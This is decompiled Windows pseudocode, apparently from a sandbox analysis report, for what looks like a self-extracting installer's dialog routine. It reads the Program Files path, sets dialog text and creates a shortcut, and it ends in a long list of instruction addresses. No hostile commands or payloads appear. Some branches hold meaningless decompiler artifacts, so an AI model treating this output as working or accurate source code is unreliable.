												_t247 = E00BAB865(_t281 - 0x5c84);
												__eflags = _t247;
												if(_t247 != 0) {
													break;
												}
												L15:
												_t250 = E00BC33F3(_t281 - 0x3c84);
												__eflags = 0;
												 *((short*)(_t281 + _t250 * 2 - 0x3c82)) = 0;
												E00BBF1A0(0x800, _t281 - 0x3c, 0, 0x1e);
												_t283 = _t283 + 0x10;
												 *((intOrPtr*)(_t281 - 0x38)) = 3;
												_push(0x14);
												_pop(_t253);
												 *((short*)(_t281 - 0x2c)) = _t253;
												 *((intOrPtr*)(_t281 - 0x34)) = _t281 - 0x3c84;
												_push(_t281 - 0x3c);
												 *0xc01074();
												goto L16;
											}
											L13:
											_t258 = E00BC33F3(_t281 - 0x103c);
											__eflags = _t280 - _t258;
											if(_t280 > _t258) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t281 - 4) =  *(_t281 - 4) | 0xffffffff;
										E00BAA3F3(_t281 - 0x8c8c);
									}
									goto L162;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E00BC33F3(__esi);
										__eax = __edi + __eax;
										_push(__eax);
										_push( *0xbfcc7c);
										__eax = E00BC341E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0xbfcc7c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E00BC6FAD(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00BC340E(__esi);
										}
									}
									goto L162;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L162;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L162;
									}
									L42:
									__eflags =  *0xbe9472 - __di;
									if( *0xbe9472 != __di) {
										goto L162;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00BC33F3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L162;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00BC161B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0xbe9472;
												E00BAFD96(0xbe9472, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00BBA81F(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xbe9472); // executed
												__eax = __ebp - 0x103c;
												__eax = E00BC3429(__ebp - 0x103c, 0xbe9472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
												}
												goto L162;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xc01028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0xc01024();
													_push( *(__ebp - 0x18));
													 *0xc01004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00BC33F3(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00BC33F3(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L162;
										} else {
											__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0xbe946c - 1;
									__eflags = __eax - 0xbe946c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xbe7442 = __cl;
										 *0xbe7443 = 1;
										goto L162;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xbe7442 = __cl;
										L79:
										 *0xbe7443 = __cl;
										goto L162;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L162;
									}
									L77:
									 *0xbe7442 = 1;
									goto L79;
								case 6:
									L86:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L90;
									}
									L87:
									__eax = __ebp - 0x5c84;
									__eax = E00BC3429(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L90;
									}
									L88:
									_push(__edi);
									goto L89;
								case 7:
									goto L0;
								case 8:
									L114:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E00BC6F4C(__ebx, __edi);
											_pop(__ecx);
											 *0xbfdc8c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xbfdc88 = E00BBAAEA(__ecx, __edx, __eflags);
									}
									 *0xbf5b73 = 1;
									goto L162;
								case 9:
									L119:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L90:
										 *0xbfdc90 = 1;
										goto L162;
									}
									L120:
									_push(1);
									L89:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E00BBCC9F(__ebp);
									goto L90;
								case 0xa:
									L121:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L162;
									}
									L122:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E00BC6280( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xbfab7a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E00BAFD96();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0xbf9b7a);
											_push(__eax);
											__eax = E00BAFD96();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xbfbb7a);
											_push(__eax);
											__eax = E00BAFD96();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L130:
										__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L147;
										}
										L131:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L147;
										}
										L132:
										_push(0x20);
										_pop(__ecx);
										do {
											L133:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L135:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L142:
													__esi->i = __di;
													L143:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L144;
												}
												L136:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L138:
													_push(0x20);
													_pop(__eax);
													do {
														L139:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L141:
													_push(__eax);
													__eax = E00BC5646();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L143;
												}
												L137:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L141;
											}
											L134:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L144;
											}
											goto L135;
											L144:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L147;
									} else {
										L128:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00BC1438(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E00BC5646(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L147:
										__eflags =  *((short*)(__ebp - 0x11c8c));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11c8c)) != 0) {
											__ebp - 0x9c8c = __ebp - 0x11c8c;
											__eax = E00BAB179(__ebp - 0x11c8c, __ebp - 0x9c8c, 0x800);
										}
										__ebp - 0xbc8c = __ebp - 0x6c84;
										__eax = E00BAB179(__ebp - 0x6c84, __ebp - 0xbc8c, __ebx);
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E00BBAA7E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14)); // executed
										}
										__ebp - 0x2c3c = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00BC5646(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E00BAB3D3(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L157:
											__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L158;
										} else {
											L156:
											__eflags = __eax;
											if(__eflags == 0) {
												L158:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00BA9F8F(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00BC5646(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E00BABC0F(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00BBA564(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00BB9B4C(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c); // executed
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													__eax = __ebp - 0xcc8c;
													SHChangeNotify(0x1000, 5, __ebp - 0xcc8c, __edi); // executed
												}
												goto L162;
											}
											goto L157;
										}
									}
								case 0xb:
									L160:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xbe9470 = 1;
									}
									goto L162;
								case 0xc:
									L81:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E00BC6280( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xbe7444 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xbe7445 = 1;
										} else {
											__eax = 0;
											 *0xbe7444 = __al;
											 *0xbe7445 = __al;
										}
									}
									goto L162;
								case 0xd:
									L91:
									 *0xbfdc91 = 1;
									__eax = __eax + 0xbfdc91;
									_t102 = __esi + 0x39;
									 *_t102 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t102;
									__ebp = 0xffffa37c;
									if( *_t102 != 0) {
										_t104 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t104;
										_push(_t104);
										 *0xbdd5fc = E00BB16F4();
									}
									goto L162;
							}
							L2:
							_t208 = E00BBA647(_t208, _t276);
							_t276 = _t276 + 0x2000;
							_t273 = _t273 - 1;
							if(_t273 != 0) {
								goto L2;
							} else {
								_t277 = _t273;
								goto L4;
							}
						}
						L163:
						 *[fs:0x0] =  *((intOrPtr*)(_t281 - 0xc));
						return _t207;
					}
					L98:
					__eflags =  *0xbf5b72;
					if( *0xbf5b72 != 0) {
						goto L162;
					}
					L99:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00BC1438(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L106:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E00BAFD96(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00BBA472(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00BB9EB3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L162;
						} else {
							L109:
							__eax = 0;
							__eflags = 0;
							 *0xbe7447 = 1;
							 *0xbe846a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L110;
						}
					}
					L100:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L106;
					}
					L101:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L102:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L103:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L104:
						goto L106;
					}
					L105:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L106;
					L110:
					__eflags = _t259 - 7;
					if(_t259 == 7) {
						__eflags =  *0xbe946c;
						if( *0xbe946c == 0) {
							 *0xbe946c = 2;
						}
						 *0xbe8468 = 1;
					}
					goto L162;
				}
			}

0x00bbc3ab
0x00bbc3ab
0x00bbc3ab
0x00bbc3ab
0x00bbc3ae
0x00000000
0x00000000
0x00bbc3b4
0x00bbc3b4
0x00bbc3ba
0x00bbc3c8
0x00bbc3d4
0x00bbc3d6
0x00bbc3d8
0x00bbc3dd
0x00bbc3dd
0x00bbc3dd
0x00bbc3f5
0x00bbc402
0x00bbc407
0x00bbc409
0x00000000
0x00000000
0x00bbc3db
0x00bbc3db
0x00bbc3db
0x00bbc3dc
0x00bbc3dc
0x00bbc40b
0x00bbc415
0x00bbc41b
0x00bbc423
0x00bbc8e3
0x00bbc8e3
0x00bbc8e3
0x00bbc8e8
0x00bbc8ec
0x00bbc8f0
0x00bbc8f7
0x00bbc8fe
0x00bbc901
0x00bbc906
0x00bbc909
0x00bbc90e
0x00bbbd8b
0x00bbbd91
0x00bbbd97
0x00bbbd97
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbbdac
0x00bbbdc3
0x00bbbdc7
0x00000000
0x00bbbdc9
0x00000000
0x00bbbdc9
0x00bbbdc7
0x00bbbdce
0x00bbbdd1
0x00000000
0x00000000
0x00bbbdd7
0x00bbbdd7
0x00000000
0x00bbbdde
0x00bbbdde
0x00bbbde1
0x00bbbdf4
0x00bbbe1a
0x00bbbe2e
0x00bbbe31
0x00bbbe3c
0x00bbbf80
0x00bbbf80
0x00bbbf80
0x00bbbf88
0x00bbbf8e
0x00bbbf93
0x00bbbf95
0x00000000
0x00000000
0x00bbbe46
0x00bbbe4e
0x00bbbe54
0x00bbbe5a
0x00bbbf00
0x00bbbf07
0x00bbbf0d
0x00bbbf10
0x00000000
0x00000000
0x00bbbf12
0x00bbbf19
0x00bbbf1f
0x00bbbf21
0x00000000
0x00bbbf23
0x00bbbf23
0x00bbbf25
0x00bbbf26
0x00bbbf2a
0x00bbbf3e
0x00bbbf43
0x00bbbf4d
0x00bbbf53
0x00bbbf56
0x00bbbf28
0x00bbbf28
0x00bbbf29
0x00000000
0x00bbbf58
0x00bbbf66
0x00bbbf6c
0x00bbbf6e
0x00bbbf7a
0x00bbbf7a
0x00000000
0x00bbbf6e
0x00bbbf56
0x00bbbf21
0x00bbbe60
0x00bbbe6f
0x00bbbe7c
0x00bbbe8d
0x00bbbe90
0x00bbbe93
0x00bbbea6
0x00bbbead
0x00bbbeb2
0x00bbbeb4
0x00000000
0x00000000
0x00bbbeba
0x00bbbec1
0x00bbbec6
0x00bbbecb
0x00bbbed7
0x00bbbedc
0x00bbbedf
0x00bbbee6
0x00bbbee8
0x00bbbee9
0x00bbbef3
0x00bbbef9
0x00bbbefa
0x00000000
0x00bbbefa
0x00bbbe95
0x00bbbe9c
0x00bbbea2
0x00bbbea4
0x00000000
0x00000000
0x00000000
0x00bbbea4
0x00bbbf9b
0x00bbbf9b
0x00bbbfa5
0x00bbbfa5
0x00000000
0x00000000
0x00bbbfaf
0x00bbbfaf
0x00bbbfb1
0x00bbc004
0x00bbc009
0x00bbc012
0x00bbc013
0x00bbc019
0x00bbc01e
0x00bbc021
0x00bbc023
0x00bbc025
0x00bbc02a
0x00bbc02c
0x00bbc02e
0x00bbc02e
0x00bbc030
0x00bbc030
0x00bbc035
0x00bbc03a
0x00bbc03b
0x00bbc03b
0x00bbc03c
0x00bbc03e
0x00bbc045
0x00bbc04a
0x00bbc03e
0x00000000
0x00000000
0x00bbc050
0x00bbc050
0x00bbc052
0x00bbc062
0x00bbc062
0x00000000
0x00000000
0x00bbc06d
0x00bbc06d
0x00bbc06f
0x00000000
0x00000000
0x00bbc075
0x00bbc075
0x00bbc07c
0x00000000
0x00000000
0x00bbc082
0x00bbc082
0x00bbc084
0x00bbc08a
0x00bbc08c
0x00bbc093
0x00bbc094
0x00bbc09b
0x00bbc09d
0x00bbc09d
0x00bbc0a4
0x00bbc0a9
0x00bbc0af
0x00bbc0b1
0x00000000
0x00bbc0b7
0x00bbc0b7
0x00bbc0b7
0x00bbc0ba
0x00bbc0bc
0x00bbc0bd
0x00bbc0c0
0x00bbc0e9
0x00bbc0e9
0x00bbc0ec
0x00bbc1d1
0x00bbc1da
0x00bbc1df
0x00bbc1df
0x00bbc1e1
0x00bbc1e1
0x00bbc1e3
0x00bbc1e5
0x00bbc1ec
0x00bbc1f1
0x00bbc1f2
0x00bbc1f3
0x00bbc1f5
0x00bbc1f7
0x00bbc1fb
0x00bbc1fd
0x00bbc1fd
0x00bbc1ff
0x00bbc1ff
0x00bbc1fb
0x00bbc203
0x00bbc209
0x00bbc216
0x00bbc21d
0x00bbc22d
0x00bbc237
0x00bbc245
0x00bbc24b
0x00bbc253
0x00bbc258
0x00bbc259
0x00bbc25a
0x00bbc25c
0x00bbc270
0x00bbc270
0x00000000
0x00bbc25c
0x00bbc0f2
0x00bbc0f2
0x00bbc0f5
0x00bbc102
0x00bbc102
0x00bbc105
0x00bbc107
0x00bbc108
0x00bbc10a
0x00bbc10b
0x00bbc110
0x00bbc115
0x00bbc11b
0x00bbc11d
0x00bbc11f
0x00bbc122
0x00bbc129
0x00bbc12a
0x00bbc130
0x00bbc131
0x00bbc134
0x00bbc135
0x00bbc136
0x00bbc13b
0x00bbc13e
0x00bbc144
0x00bbc14d
0x00bbc150
0x00bbc155
0x00bbc157
0x00bbc159
0x00bbc15b
0x00bbc15b
0x00bbc15d
0x00bbc15d
0x00bbc15f
0x00bbc15f
0x00bbc167
0x00bbc16e
0x00bbc170
0x00bbc177
0x00bbc17d
0x00bbc17f
0x00bbc180
0x00bbc188
0x00bbc197
0x00bbc197
0x00bbc188
0x00bbc1a2
0x00bbc1a4
0x00bbc1b3
0x00bbc1b9
0x00bbc1bf
0x00bbc1ca
0x00bbc1ca
0x00000000
0x00bbc1bf
0x00bbc0f7
0x00bbc0f7
0x00bbc0fc
0x00000000
0x00000000
0x00000000
0x00bbc0fc
0x00bbc0c2
0x00bbc0c2
0x00bbc0c6
0x00000000
0x00000000
0x00bbc0c8
0x00bbc0c8
0x00bbc0cb
0x00bbc0cd
0x00bbc0d0
0x00000000
0x00bbc0d6
0x00bbc0df
0x00000000
0x00bbc0df
0x00bbc0d0
0x00000000
0x00bbc27b
0x00bbc27b
0x00bbc27c
0x00bbc281
0x00bbc283
0x00bbc286
0x00bbc286
0x00000000
0x00bbc2bc
0x00bbc2bc
0x00bbc2c3
0x00bbc2c5
0x00bbc2c5
0x00bbc2c7
0x00bbc2f6
0x00bbc2f6
0x00bbc2fc
0x00000000
0x00bbc2fc
0x00bbc2c9
0x00bbc2c9
0x00bbc2c9
0x00bbc2cc
0x00bbc2e5
0x00bbc2e5
0x00bbc2eb
0x00bbc2eb
0x00000000
0x00bbc2eb
0x00bbc2ce
0x00bbc2ce
0x00bbc2ce
0x00bbc2d1
0x00000000
0x00000000
0x00bbc2d3
0x00bbc2d3
0x00bbc2d3
0x00bbc2d6
0x00000000
0x00000000
0x00bbc2dc
0x00bbc2dc
0x00000000
0x00000000
0x00bbc349
0x00bbc349
0x00bbc34c
0x00000000
0x00000000
0x00bbc34e
0x00bbc34e
0x00bbc35a
0x00bbc35f
0x00bbc360
0x00bbc361
0x00bbc363
0x00000000
0x00000000
0x00bbc365
0x00bbc365
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbc557
0x00bbc557
0x00bbc55a
0x00bbc55c
0x00bbc563
0x00bbc565
0x00bbc56b
0x00bbc56c
0x00bbc571
0x00bbc572
0x00bbc572
0x00bbc577
0x00bbc57a
0x00bbc580
0x00bbc580
0x00bbc585
0x00000000
0x00000000
0x00bbc591
0x00bbc591
0x00bbc594
0x00bbc375
0x00bbc375
0x00000000
0x00bbc375
0x00bbc59a
0x00bbc59a
0x00bbc366
0x00bbc366
0x00bbc36c
0x00bbc36d
0x00bbc370
0x00000000
0x00000000
0x00bbc5a1
0x00bbc5a1
0x00bbc5a4
0x00000000
0x00000000
0x00bbc5aa
0x00bbc5aa
0x00bbc5ac
0x00bbc5b3
0x00bbc5bb
0x00bbc5c1
0x00bbc5c6
0x00bbc5c9
0x00bbc5fe
0x00bbc603
0x00bbc609
0x00bbc60a
0x00bbc60f
0x00bbc5cb
0x00bbc5cb
0x00bbc5ce
0x00bbc5d4
0x00bbc5ea
0x00bbc5ef
0x00bbc5f0
0x00bbc5f5
0x00bbc5d6
0x00bbc5d6
0x00bbc5db
0x00bbc5dc
0x00bbc5e1
0x00bbc5e1
0x00bbc5d4
0x00bbc616
0x00bbc618
0x00bbc61f
0x00bbc62d
0x00bbc634
0x00bbc639
0x00bbc63a
0x00bbc63b
0x00bbc63d
0x00bbc63e
0x00bbc645
0x00bbc68e
0x00bbc695
0x00bbc69a
0x00bbc69c
0x00000000
0x00000000
0x00bbc6a2
0x00bbc6a2
0x00bbc6a4
0x00bbc6aa
0x00bbc6b1
0x00000000
0x00000000
0x00bbc6b3
0x00bbc6b3
0x00bbc6b5
0x00bbc6b6
0x00bbc6b6
0x00bbc6b6
0x00bbc6b9
0x00bbc6bc
0x00bbc6c6
0x00bbc6c6
0x00bbc6c8
0x00bbc6ca
0x00bbc6d4
0x00bbc6d9
0x00bbc6db
0x00bbc719
0x00bbc719
0x00bbc71c
0x00bbc71c
0x00bbc71e
0x00bbc71f
0x00bbc71f
0x00000000
0x00bbc71f
0x00bbc6dd
0x00bbc6dd
0x00bbc6df
0x00bbc6e0
0x00bbc6e2
0x00bbc6e5
0x00bbc6fa
0x00bbc6fa
0x00bbc6fc
0x00bbc6fd
0x00bbc6fd
0x00bbc6fd
0x00bbc700
0x00bbc700
0x00bbc705
0x00bbc706
0x00bbc70c
0x00bbc70c
0x00bbc70d
0x00bbc712
0x00bbc713
0x00bbc714
0x00000000
0x00bbc714
0x00bbc6e7
0x00bbc6e7
0x00bbc6ee
0x00bbc6f1
0x00bbc6f2
0x00000000
0x00bbc6f2
0x00bbc6be
0x00bbc6be
0x00bbc6c0
0x00bbc6c1
0x00bbc6c4
0x00000000
0x00000000
0x00000000
0x00bbc721
0x00bbc721
0x00bbc724
0x00bbc724
0x00bbc729
0x00bbc72b
0x00bbc72d
0x00bbc72d
